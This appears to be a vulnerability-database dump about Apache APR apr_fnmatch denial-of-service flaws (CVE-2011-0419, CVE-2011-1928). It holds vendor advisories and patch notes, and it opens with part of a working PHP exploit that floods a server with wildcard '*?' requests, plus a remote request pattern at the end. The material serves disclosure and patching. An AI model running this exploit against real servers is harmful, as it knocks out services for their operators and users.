-aux -p 617 \nUSER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND\nwww 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start \n\nTime = 121:43 and counting\n\nwhere http://[$localhost]:[$localport]/[$localuri]\n*/\n$localhost=\"localhost\";\n$localport=80;\n$localuri=\"/koniec/\";\n\n\nif(!is_writable(\".\")) die(\"!writable\");\n\n// Phase 1\n// Create some filename\ntouch(\"cx\".str_repeat(\".\",125));\n\n// Phase 2\n// Create .htaccess with \nunlink(\"./.htaccess\");\n$htaccess=fopen(\"./.htaccess\", \"a\");\nfwrite($htaccess,\"AddDescription \\\"CVE-2011-0419\\\" \".str_repeat('*.',512).\"\\n\");\nfclose($htaccess);\n\n// Phase 3\n// Local connect (bypass firewall restriction)\nwhile(1){\n\t$fp = fsockopen($localhost, $localport, $errno, $errstr, 30);\n\tif (!$fp) echo \"$errstr ($errno)<br />\\n\";\n\telse {\n\t\t$out = \"GET \".$localuri.\"/?P=\".str_repeat(\"*?\",1500).\"* HTTP/1.1\\r\\n\";\n\t\t$out .= \"Host: \".$localhost.\"\\r\\n\";\n\t\t$out .= \"Connection: Close\\r\\n\\r\\n\";\n\t\tfwrite($fp, $out);\n\t\tfclose($fp);\n\t}\n}\n\n?>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-04T14:46:08", "description": "Stack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and\nthe Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD\n5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and\nAndroid, allows context-dependent attackers to cause a denial of service\n(CPU and memory consumption) via *? sequences in the first argument, as\ndemonstrated by attacks against mod_autoindex in httpd.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | TODO: also check apr-util \n[sbeattie](<https://launchpad.net/~sbeattie>) | update for apr-util is not needed.\n", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "ubuntucve", "title": "CVE-2011-0419", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-16T00:00:00", "id": "UB:CVE-2011-0419", "href": "https://ubuntu.com/security/CVE-2011-0419", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-04T14:46:04", "description": "The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime\n(APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows\nremote attackers to cause a denial of service (infinite loop) via a URI\nthat does not match unspecified types of wildcard patterns, as demonstrated\nby attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration\npattern is used. NOTE: this issue exists because of an incorrect fix for\nCVE-2011-0419.", "cvss3": {}, "published": "2011-05-24T00:00:00", "type": "ubuntucve", "title": "CVE-2011-1928", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-24T00:00:00", "id": "UB:CVE-2011-1928", "href": "https://ubuntu.com/security/CVE-2011-1928", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:04:00", "description": "gtraq ID: 47820\r\nCVE ID\uff1aCVE-2011-0419\r\n\r\nApache APR-util\u662f\u4e00\u6b3e\u53ef\u79fb\u690d\u8fd0\u884c\u5e93\uff0c\u5168\u540d\u4e3aApache Portable Runtime\u3002\r\n\u5f53\u5904\u7406\u67d0\u4e9b\u6a21\u5f0f\u65f6"apr_fnmatch()"\u51fd\u6570\u5b58\u5728\u5faa\u73af\u9012\u5f52\u9519\u8bef\uff0c\u901a\u8fc7\u63d0\u4ea4\u5305\u542b\u901a\u914d\u7b26(\u5982"*")\u7684\u7279\u5236\u8bf7\u6c42\u65f6\u53ef\u89e6\u53d1\u57fa\u4e8e\u6808\u7684\u6ea2\u51fa\n\nApache APR 1.x\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nApache Software Foundation APR 1.4.4 \u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.apache.org/dist/apr/CHANGES-APR-1.4", "cvss3": {}, "published": "2011-05-13T00:00:00", "title": "Apache APR 'apr_fnmatch()'\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20555", "id": "SSV:20555", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2023-06-04T14:01:56", "description": "Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.", "cvss3": {}, "published": "2011-05-16T17:55:00", "type": "cve", "title": "CVE-2011-0419", "cwe": ["CWE-770"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2022-09-19T19:47:00", "cpe": ["cpe:/o:freebsd:freebsd:*", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:apache:http_server:2.0.65", "cpe:/o:google:android:*", "cpe:/a:apache:portable_runtime:1.4.3", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:oracle:solaris:10", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:openbsd:openbsd:4.8", "cpe:/o:netbsd:netbsd:5.1", "cpe:/o:apple:mac_os_x:10.6.0"], "id": "CVE-2011-0419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0419", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:*:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:4.8:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:portable_runtime:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp3:*:*:-:*:*:*", "cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-04T14:06:21", "description": "The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.", "cvss3": {}, "published": "2011-05-24T23:55:00", "type": "cve", "title": "CVE-2011-1928", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2023-02-13T04:30:00", "cpe": ["cpe:/a:apache:apr-util:1.4.4", "cpe:/a:apache:apr-util:1.4.3", "cpe:/a:apache:http_server:2.2.18"], "id": "CVE-2011-1928", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1928", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:apr-util:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:apr-util:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.18:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-06-04T14:54:40", "description": "Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.", "cvss3": {}, "published": "2011-05-16T17:55:00", "type": "debiancve", "title": "CVE-2011-0419", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-16T17:55:00", "id": "DEBIANCVE:CVE-2011-0419", "href": "https://security-tracker.debian.org/tracker/CVE-2011-0419", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-04T14:54:40", "description": "The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.", "cvss3": {}, "published": "2011-05-24T23:55:00", "type": "debiancve", "title": "CVE-2011-1928", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-24T23:55:00", "id": "DEBIANCVE:CVE-2011-1928", "href": "https://security-tracker.debian.org/tracker/CVE-2011-1928", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "httpd": [{"lastseen": "2023-06-04T14:50:18", "description": "A flaw was found in the apr_fnmatch() function of the bundled APR library. Where mod_autoindex is enabled, and a directory indexed by mod_autoindex contained files with sufficiently long names, a remote attacker could send a carefully crafted request which would cause excessive CPU usage. This could be used in a denial of service attack.\nWorkaround: Setting the 'IgnoreClient' option to the 'IndexOptions' directive disables processing of the client-supplied request query arguments, preventing this attack.\nResolution: Update APR to release 1.4.5 (bundled with httpd 2.2.19) or release 0.9.20 (bundled with httpd 2.0.65)", "cvss3": {}, "published": "2011-03-02T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.2.19 : apr_fnmatch flaw leads to mod_autoindex remote DoS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-21T00:00:00", "id": "HTTPD:C730B9155CAC64B44A77E253B3135FE5", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-04T14:50:18", "description": "A flaw was found in the apr_fnmatch() function of the bundled APR library. Where mod_autoindex is enabled, and a directory indexed by mod_autoindex contained files with sufficiently long names, a remote attacker could send a carefully crafted request which would cause excessive CPU usage. This could be used in a denial of service attack.\nWorkaround: Setting the 'IgnoreClient' option to the 'IndexOptions' directive disables processing of the client-supplied request query arguments, preventing this attack.\nResolution: Update APR to release 1.4.5 (bundled with httpd 2.2.19) or release 0.9.20 (bundled with httpd 2.0.65)", "cvss3": {}, "published": "2011-03-02T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.0.65 : apr_fnmatch flaw leads to mod_autoindex remote DoS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-21T00:00:00", "id": "HTTPD:B821541A5FE3011C9F886A2768987864", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2023-06-04T15:12:06", "description": "\n\nThe Apache Portable Runtime Project reports:\n\nNote especially a security fix to APR 1.4.4, excessive CPU\n\t consumption was possible due to an unconstrained, recursive\n\t invocation of apr_fnmatch, as apr_fnmatch processed '*' wildcards.\n\t Reimplement apr_fnmatch() from scratch using a non-recursive\n\t algorithm now has improved compliance with the fnmatch() spec.\n\t (William Rowe)\n\n\n", "cvss3": {}, "published": "2011-05-10T00:00:00", "type": "freebsd", "title": "Apache APR -- DoS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-10T00:00:00", "id": "00B296B6-7DB1-11E0-96B7-00300582F9FC", "href": "https://vuxml.freebsd.org/freebsd/00b296b6-7db1-11e0-96b7-00300582f9fc.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-04T15:12:06", "description": "\n\nThe Apache Portable Runtime Project reports:\n\nReimplement apr_fnmatch() from scratch using a non-recursive\n\t algorithm; now has improved compliance with the fnmatch()\n\t spec.\n\n\n", "cvss3": {}, "published": "2011-05-19T00:00:00", "type": "freebsd", "title": "Apache APR -- DoS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-19T00:00:00", "id": "38560D79-0E42-11E1-902B-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/38560d79-0e42-11e1-902b-20cf30e32f6d.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-04T15:12:06", "description": "\n\nThe Apache Portable Runtime Project reports:\n\nA flaw was discovered in the apr_fnmatch() function in the\n\t Apache Portable Runtime (APR) library 1.4.4 (or any backported\n\t versions that contained the upstream fix for CVE-2011-0419).\n\t This could cause httpd workers to enter a hung state (100% CPU\n\t utilization).\napr-util 1.3.11 could cause crashes with httpd's\n\t mod_authnz_ldap in some situations.\n\n\n", "cvss3": {}, "published": "2011-05-19T00:00:00", "type": "freebsd", "title": "Apache APR -- DoS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-19T00:00:00", "id": "99A5590C-857E-11E0-96B7-00300582F9FC", "href": "https://vuxml.freebsd.org/freebsd/99a5590c-857e-11e0-96b7-00300582f9fc.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "slackware": [{"lastseen": "2023-06-04T16:01:31", "description": "New apr and apr-util packages are available for Slackware 11.0, 12.0, 12.1,\n12.2, 13.0, 13.1, 13.37, and -current to fix a security issue.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/apr-1.4.4-i486-1_slack13.37.txz: Upgraded.\n This fixes a possible denial of service due to an unconstrained, recursive\n invocation of apr_fnmatch(). This function has been reimplemented using a\n non-recursive algorithm. Thanks to William Rowe.\n For more information, see:\n https://vulners.com/cve/CVE-2011-0419\n (* Security fix *)\npatches/packages/apr-util-1.3.11-i486-1_slack13.37.txz: Upgraded.\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/apr-1.4.4-i486-1_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/apr-util-1.3.11-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-1.4.4-i486-1_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.3.11-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-1.4.4-i486-1_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.3.11-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-1.4.4-i486-1_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.3.11-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-1.4.4-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.3.11-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-1.4.4-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.3.11-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-1.4.4-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.3.11-i486-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-1.4.4-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.3.11-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-1.4.4-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.3.11-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-1.4.4-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.3.11-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-1.4.4-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.3.11-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-1.4.4-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.3.11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n0b18b21f2709e592f2d829323c8db2bd apr-1.4.4-i486-1_slack11.0.tgz\n6313ea5ec365a07c86eaaba2ae5a7696 apr-util-1.3.11-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb9b2c76b963a9dcba68c54172dbfd2e8 apr-1.4.4-i486-1_slack12.0.tgz\n015ad6f362a378efd18f12cb9ecc7c9d apr-util-1.3.11-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n9e80da5d7f8f823a2ed9936b3cd0269b apr-1.4.4-i486-1_slack12.1.tgz\n00ab57f63b1c30c7cf6cfcea365badb1 apr-util-1.3.11-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\naee097dbd39db150302d02f86d92609e apr-1.4.4-i486-1_slack12.2.tgz\ne61f61b8723bd06da8275e015ea03eac apr-util-1.3.11-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n023e7e77f01816d92a707546d570ec79 apr-1.4.4-i486-1_slack13.0.txz\ne168ac8e42e201c7af87c3fd231ec95f apr-util-1.3.11-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7343a01be2f8a38118c75aa5133a7958 apr-1.4.4-x86_64-1_slack13.0.txz\n458a11c15ed52db5b510c7d1aea065d5 apr-util-1.3.11-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n39a284a31204f0572d9e732df2e51c92 apr-1.4.4-i486-1_slack13.1.txz\nfd264ef731d61afa627489dec1ed6d37 apr-util-1.3.11-i486-1_slack13.1.txz\n\nSlackware 13.37 package:\n2afbb475a8a0e4b5f48d42d2ba49a668 apr-1.4.4-i486-1_slack13.37.txz\na0e0f77943e718f26c448f7da7590406 apr-util-1.3.11-i486-1_slack13.37.txz\n\nSlackware x86_64 13.1 package:\n232289470e6486f08f7b9ee3755c055e apr-1.4.4-x86_64-1_slack13.1.txz\n777badbae85f141b55b370337967c55c apr-util-1.3.11-x86_64-1_slack13.1.txz\n\nSlackware x86_64 13.37 package:\n9a2d329a4cdabb9369e9ed7e78cdffcf apr-1.4.4-x86_64-1_slack13.37.txz\n6ba07cc7e5cab3ac648d0012783fe455 apr-util-1.3.11-x86_64-1_slack13.37.txz\n\nSlackware -current package:\n4e010ab165a7504563f316db5b0e34ac apr-1.4.4-i486-1.txz\n7c4c1d8febf9e51a95b627e6631ea2b2 apr-util-1.3.11-i486-1.txz\n\nSlackware x86_64 -current package:\n5707d225f07da633c67773f6cc6d3fd6 apr-1.4.4-x86_64-1.txz\n31d3ce32a2e964ab3128804077cdccd0 apr-util-1.3.11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg apr-1.4.4-i486-1_slack13.37.txz apr-util-1.3.11-i486-1_slack13.37.txz", "cvss3": {}, "published": "2011-05-14T05:03:34", "type": "slackware", "title": "[slackware-security] apr/apr-util", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-14T05:03:34", "id": "SSA-2011-133-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.705697", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2023-06-04T15:02:50", "description": "", "cvss3": {}, "published": "2011-05-12T00:00:00", "type": "exploitdb", "title": "Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2011-0419", "CVE-2011-0419"], "modified": "2011-05-12T00:00:00", "id": "EDB-ID:35738", "href": "https://www.exploit-db.com/exploits/35738", "sourceData": "source: https://www.securityfocus.com/bid/47820/info\n\nApache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.\n\nApache APR versions prior to 1.4.4 are vulnerable.\n\n<?php\n/*\nApache 2.2.17 mod_autoindex local/remote Denial of Service\nauthor: Maksymilian Arciemowicz\n\nCVE: CVE-2011-0419\nCWE: CWE-399\n\nREMOTE\nFind some directory with supported mod_autoindex on the server. The directory should contain long filenames.\n\nhttp://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]\n\nLOCAL\nTested on:\n127# httpd -v && uname -a\nServer version: 